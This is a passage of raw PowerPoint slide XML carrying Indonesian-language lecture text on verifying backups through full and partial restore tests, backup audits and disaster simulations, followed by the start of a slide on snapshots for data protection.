              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> uji </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Metode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diharapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> uji </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>parsial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, di mana file, folder, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> database yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsistensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subset data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teratur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadwal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipelihara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diinginkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Selanjutnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mensimulasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ransomware, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesiapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selesai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sukses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 100%" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyembunyikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyadari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diasumsikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>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154</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286981104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Perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Data Tingkat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Lanjut</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Snapshot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Snapshot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memainkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Snapshot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Virtual (VM), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file, dan Storage Area Network (SAN) </a:t>
            </a:r>
